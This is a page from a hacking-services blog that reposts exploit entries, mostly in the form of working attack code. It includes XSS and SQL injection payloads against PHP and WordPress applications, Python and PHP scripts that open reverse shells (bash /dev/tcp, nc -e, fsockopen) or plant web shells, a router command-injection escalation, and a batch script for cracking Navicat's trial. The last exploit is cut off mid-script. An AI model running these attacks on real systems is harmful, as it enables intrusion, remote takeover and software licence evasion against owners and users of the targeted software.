Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138741

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
HireHackking 
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
HireHackking 
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/ 
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6 
# Tested on: macOS 11.4
# CVE : CVE-2021-24610

Description:
The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "<script></script>" with the preg_replace, the attacker can use the HTML Tag to execute javascript.

Step To Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Input Gettext String
3. Input the payload such as <img src=x onerror=alert(4)>
4. Save, The payload will be executed.
5. Look on the homepage will be affected.

Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
HireHackking 
# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# Date: 27/09/2021
# Exploit Author: shinris3n
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

'''
This Python 3 implementation is based on the original (Python 2) exploit code developed by 
Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec.  The following modifications were made:

1 - Made required changes to print and socket commands for Python 3 compatibility.
1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
3 - Added a payload that can be used for testing remote command execution and connectivity.
4 - Added payload and listener information output based on payload selection and user input.
5 - Added execution output clarifications and additional informational comments throughout the code.

@shinris3n
https://twitter.com/shinris3n
https://shinris3n.github.io/
'''

#!/usr/bin/python3

import socket
import sys
import time

# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 4:
    sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
    sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
    sys.exit(1)

remote_ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]

# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only

print ("[+]Payload Selected (see script for more options): ", payload)
if '/bin/bash' in payload:
    print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)


def recv(s):
        s.recv(1024)
        time.sleep(0.2)

try:
    print ("[+]Connecting to James Remote Administration Tool...")
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
    s.recv(1024)
    s.send((user + "\n").encode('utf-8'))
    s.recv(1024)
    s.send((pwd + "\n").encode('utf-8'))
    s.recv(1024)
    print ("[+]Creating user...")
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
    s.recv(1024)
    s.send("quit\n".encode('utf-8'))
    s.close()

    print ("[+]Connecting to James SMTP server...")
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.
    s.send("ehlo team@team.pl\r\n".encode('utf-8'))
    recv(s)
    print ("[+]Sending payload...")
    s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
    recv(s)
    s.send("data\r\n".encode('utf-8'))
    recv(s)
    s.send("From: team@team.pl\r\n".encode('utf-8'))
    s.send("\r\n".encode('utf-8'))
    s.send("'\n".encode('utf-8'))
    s.send((payload + "\n").encode('utf-8'))
    s.send("\r\n.\r\n".encode('utf-8'))
    recv(s)
    s.send("quit\r\n".encode('utf-8'))
    recv(s)
    s.close()
    print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
    if '/bin/bash' in payload:
        print ("[+]Don't forget to start a listener on port", port, "before logging in!")
except:
    print ("Connection failed.")
HireHackking
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) # Date: 2/15/2021 # Author: 0xB9 # Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip # Version: 1.3.1 # Tested on: Windows 10 # CVE: CVE-2021-24287 1. Description: The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
HireHackking
# Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 28.09.2021 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code # Version: 1 # Tested on: Ubuntu import requests from bs4 import BeautifulSoup import sys import random import string import time if len(sys.argv) != 4: print("[~] Usage : python3 exploit.py localhost ip port") exit() site = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>" letters = string.ascii_lowercase name = ''.join(random.choice(letters) for i in range(5)) def LoginAndShellUpload(): login = 'http://'+site+':80/storage/classes/Login.php?f=login' session = requests.session() post_data = {"username": "' OR 1=1-- -", "password": "aa"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() print('[+]Success login') print('[+]Try Shell upload') time.sleep(2) #shell upload url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings' cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n" requests.post(url, headers=headers, cookies=cookies, data=data) print('[+]Success!') print('[+]Getting reverse shell') time.sleep(2) def RCE(): path = 'http://'+site+'/storage/uploads/' html_text = requests.get(path).text soup = BeautifulSoup(html_text, 'html.parser') for link in soup.find_all('a'): data = link.get('href') with open('shell_location.txt', 'w') as f: f.write(data) path2 = 'shell_location.txt' shell_file = open(path2,'r') shell = shell_file.readline() r = requests.get('http://'+site+'/storage/uploads/'+shell) print(r.text) print('[+]Hacked!') LoginAndShellUpload() RCE()
HireHackking
# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) # Date: 28.09.2021 # Exploit Author: Murat # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Windows 10 # Pharmacy Point of Sale System v1.0 SQLi GET /pharmacy/view_product.php?id=-1 HTTP/1.1 Host: localhost Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6 Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Connection: close POC: https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1-- ----------------------------------------------------------------------- #Other parameters with sql injection vulnerability; ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1 ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true ==> /pharmacy/manage_product.php?id=-1' ==> POST /pharmacy/Actions.php?a=save_stock ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supplier_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_id" 2'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="quantity" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="expiry_date" ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" 5'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_code" 94102'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="category_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="name" pHqghUme'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="price" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="description" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="status" 0'" ------------YWJkMTQzNDcw-- -
HireHackking
# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass # Date: 29-09-2021 # Exploit Author: sudoninja # Vendor Homepage: https://phpgurukul.com # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ # Version: 1.0 # Tested on: XAMPP / Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/ccms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ccms Step 5 – Click forward and now you will be logged in as admin. POC POST /ccms/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/ccms/ Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du Upgrade-Insecure-Requests: 1 username='%20OR%201%20--%20-&password=ccms&login=
HireHackking
# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 28.09.2021 # Author: Mr.Gedik # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html # Version: 1.0 # https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB Vulnerable code controllers/add_petmanagement.php Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"], $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"])); Exploit ############# <?php /* @author:mrgedik */ function anim($msg, $time) { $msg = str_split($msg); foreach ($msg as $ms) { echo $ms; usleep($time); } } anim("__ __ _____ _ _ _ | \/ | / ____| | (_) | | \ / |_ __| | __ ___ __| |_| | __ | |\/| | '__| | |_ |/ _ \/ _` | | |/ / | | | | |_ | |__| | __/ (_| | | < |_| |_|_(_) \_____|\___|\__,_|_|_|\_\ ", 900); echo PHP_EOL; while(1) { echo anim("Target (http://example.com/path/): ", 800); $target = trim(fgets(STDIN)); echo PHP_EOL; if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) { echo "Not a valid URL".PHP_EOL; }else { break; } } @unlink("exp.php"); $fw = fopen("exp.php","a+"); fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>'); fclose($fw); $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php"); $fields = [ 'images' => new \CurlFile("exp.php", 'image/png', 'exp.php') ]; curl_setopt($ch, CURLOPT_POSTFIELDS, $fields); $response = curl_exec($ch); @unlink("exp.php"); if(strstr($response,"success")) { while(1) { echo anim("root@pwn: ", 800); $command = trim(fgets(STDIN)); if($command == trim("exit")) { exit; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); echo curl_exec($ch); curl_close ($ch); } }else { echo anim("Fail", 800); } ?>
HireHackking
# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass # Date: 30-09-2021 # Exploit Author: Nitin Sharma (Vidvansh) # Vendor Homepage: https://code-projects.org # Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/ # Version: 1.0 # Tested on: XAMPP / Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. POC POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 40 Origin: http://localhost Connection: close Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
HireHackking

Phpwcms 1.9.30 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload # Date: 30/9/2021 # Exploit Author: Okan Kurtulus | okankurtulus.com.tr # Software Link: http://www.phpwcms.org/ # Version: 1.9.30 # Tested on: Ubuntu 16.04 Steps: 1-) You need to login to the system. http://target.com/phpwcms/login.php 2-) Creating payload with SVG extension: payload.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS!"); </script> </svg> 3-) Go to the following link and upload the payload: http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8 From the menu: file -> multiple file upload -> Select files or drop here 4-) After uploading payload, call it from the link below. http://192.168.1.112/phpwcms/upload/
HireHackking

CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Date: 01-10-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.cmsimple-xh.org/ # Software Link: https://www.cmsimple-xh.org/?Downloads # Version: 1.7.4 # Category: Webapps # Tested on: Linux/Windows # CMSimple_XH is an open source project under GPL3 license # Includes an endpoint that allows remote access # Backup page is misconfigured, causing security vulnerability # User information with sufficient permissions is required. # Example: python3 exploit.py -u http://example.com -p Admin123 from bs4 import BeautifulSoup from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code == 200: login(args) else: print("[-] Address not reachable!") sleep(2) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def login(args): url = args.host + "/?&login" cookies = { "XH_2f": "evil" } headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?&login" } data = { "login": "true", "keycut": args.password, "submit": "Login" } response = requests.post(url, headers=headers, cookies=cookies, data=data) token = response.cookies.get("XH_2f") soup = BeautifulSoup(response.text, 'html.parser') if (soup.find("link",{"rel":"next"})['href'] != "/"): print("[!] Login Success!\n") sleep(2) csrf(args,token) else: print("[!] Wrong password!!\n") sleep(2) def csrf(args, token): url = args.host + "/?file=content" cookies = { "status": "adm", "XH_2f": token } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?&settings", "Accept-Encoding": "gzip, deflate", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) try: soup = BeautifulSoup(response.text, 'html.parser') csrf = soup.find_all("input", type="hidden")[3].get("value") create(args, token, csrf) except Exception as e: print(e) else: pass def create(args, token, csrf): payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n" url = args.host cookies = { "status": "adm", "XH_2f": token } headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?file=content&action=edit&xh_success=content", "Accept-Encoding": "gzip, deflate" } data = { "text": payload, "file": "content", "action": "save", "xh_csrf_token": csrf } response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True) if (response.status_code == 200): print("[!] Create Vuln File!\n") sleep(2) exploit(args) else: print("[!] Create Failed!\n") sleep(2) def exploit(args): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
HireHackking
# Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-10-01 # Exploit Author: SUDONINJA # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step 4 – Change the username to admin' or '1'='1 and password to dfsms Step 5 – Click forward and now you will be logged in as admin. POC POST /dms/admin/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: http://localhost Connection: close Referer: http://localhost/dms/admin/ Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl Upgrade-Insecure-Requests: 1 username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
HireHackking
# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-09-30 # Exploit Author: sanjay singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step 4 – Change the username to admin' or '1'='1 and password to dfsms Step 5 – Click forward and now you will be logged in as admin. POC POST /dfsms/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Origin: http://localhost Connection: close Referer: http://localhost/dfsms/index.php Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl Upgrade-Insecure-Requests: 1 username=admin%27+or+%271%27%3D%271&password=dfsms&login=
HireHackking

Title: Navicat Premium 16.0.10 Cracked Installation

HACKER · %s · %s

Navicat Premium is a great database management tool. Connect this tool to a database where you can see detailed information for various databases. This includes reporting errors, etc. Of course, you can also log in to the database through it and perform various operations. Navicat Premium is a multi-link database management tool that allows you to connect to MySQL, SQLite, Oracle and PostgreSQL databases simultaneously in one program, making it easier to manage different types of databases.
version
Navicat Premium 16.0.10
Download
Official website download address: https://www.navicat.com.cn/products/navicat-premium
New Features in Navicat Premium 16
1. Chart
Navicat 16 provides more data sources and chart support. We focus very much on improving usability and accessibility to provide vital information for your work.
2. Data generation
Data generation helps you create a large amount of test data. Lets you create complex data in multiple tables that are associated with each other.
3. On-Prem Server has now been added to our Navicat series. We provide you with the option to host cloud environments to store Navicat objects internally where you are.
4. Connect to the configuration file
Configure multiple connection profiles for outbound users, and connect settings can be switched according to the current location of the device used.
5. Productivity
Navicat 16 has numerous features and UI/UX improvements to meet your database development needs. Provides you with new ways to build, manage and maintain databases.
Installation



Cracking
Navicat 16.0.10 currently has no registration machine, but we can use the method of clearing the registry. to extend the probation period. Of course, you can also download the cracked version of other versions of 16.0.x.
The script is as follows:
@echo off
echo Delete HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium\Registration[version and language]
for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium' /s | findstr /L Registration'') do (
reg delete %%i /va /f
)
echo.
echo Delete Info folder under HKEY_CURRENT_USER\Software\Classes\CLSID
for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\Classes\CLSID' /s | findstr /E Info'') do (
reg delete %%i /va /f
)
echo.
echo Finish
pause so when Navicat expires, we double-click the script. You can play happily again.
HireHackking
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) # Date: 2/3/2021 # Author: 0xB9 # Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip # Version: 1.3.0 # Tested on: Windows 10 # CVE: CVE-2021-24286 1. Description: This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
HireHackking

Mitrastar GPT-2541GNAC-N1 - Privilege escalation

HACKER · %s · %s

# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation # Date: 10-08-2021 # Exploit Author: Leonardo Nicolas Servalli # Vendor Homepage: www.mitrastar.com # Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) # Tested on: Firmware BR_g3.5_100VNZ0b33 # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md Description: ---------- # Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials). # The command “deviceinfo show file <path>” is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using “&&/bin/bash” as parameter value we can spawn a bash console, as seen on the next example: Exploit: -------- > deviceinfo show file &&/bin/bash # This command will spawn a full interoperable bash console with root privileges.
HireHackking

Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) # Date: 29.09.2021 # Exploit Author: pussycat0x # Vendor Homepage: https://www.cmsimple.org/ # Version: 5.4 # Tested on: ubuntu-20.04.1 import argparse from bs4 import BeautifulSoup from argparse import ArgumentParser import requests parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport') rparser = parser.add_argument_group('required argument') rparser.add_argument('-url','--host', type=str, help='target domain',required=True) rparser.add_argument('-u' ,'--username', type=str, help='', required=True) rparser.add_argument('-p','--password',type=str,help='', required=True) rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True) rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True) args= parser.parse_args() #url ='192.168.1.106' s = requests.Session() def main(): try: url =(args.host) payload = { 'user':args.username, 'passwd':args.password, 'submit': 'Login', 'login':'true', } login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload) if login.status_code == 200: 